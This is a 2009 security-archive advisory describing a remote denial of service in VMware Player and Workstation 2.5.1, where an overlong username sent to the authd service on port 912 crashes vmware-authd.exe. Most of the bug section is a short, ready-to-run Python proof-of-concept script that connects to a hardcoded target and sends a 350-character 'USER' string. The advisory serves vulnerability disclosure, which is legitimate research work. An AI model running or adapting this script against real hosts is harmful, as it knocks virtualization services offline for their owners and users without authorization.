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VMware 2.5.1 Denial Of Service

VMware 2.5.1 Denial Of Service
Posted Jan 3, 2009
Authored by laurent gaffie

VMware versions 2.5.1 and below remote denial of service exploit.

tags | exploit, remote, denial of service
SHA-256 | a0c9a07060798d754c1b523f88241f1a438aff5e854d29b97a61acb5c09af178

VMware 2.5.1 Denial Of Service

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Vmware <= 2.5.1 build-126130 Remote Denial of Service

Application: Vmware

Web Site: https://www.vmware.com/

Platform: Windows *

Bug: Remote Denial of Service

Tested agains: Vmware player 2.5.1 build-126130, workstation 2.5.1 build-126130, using Windows XP SP3 fully patched

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1) Introduction

2) Bug

3) Proof of concept

4) Credits

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1) Introduction

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"VMware desktop virtualization technology lets you run multiple operating systems on a single physical computer.
Easily run Windows applications on your Mac, including high end games and other graphic applications,
with VMware Fusion. Run Windows and Linux applications on Windows or Linux PCs with the free VMware Player."

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2) Bug

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Vmware-authd listen on 0.0.0.0 port 912 on a windows box by default.
A denial of service exist in the module vmwarebase.dll of the system process vmware-authd.exe when a long username
or password is supplied to the service, code execution doesn't look possible at this time.
A dump file will be created here: C:\Documents and Settings\LocalService\Application Data\VMware\vmware-authd-*.dmp
Also some old version of this binary (like 6.00.3938.0000) doesn't seems vulnerable to this DoS.
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3)Proof of concept

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Auth-dos.py :

import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = 'A' * 350
target = '192.168.0.102'
port = 912
s.connect((target, port))
data = s.recv(1024)
s.send('USER '+buff+'\r\n')
data = s.recv(1024)
s.send('PASS yo \r\n')
data = s.recv(1024)
print " [+] sending dummy payload"
s.close()
print " [+] done! "

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4)Credits

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laurent gaffiƩ

laurent.gaffie{remove_this}[at]gmail[dot]com

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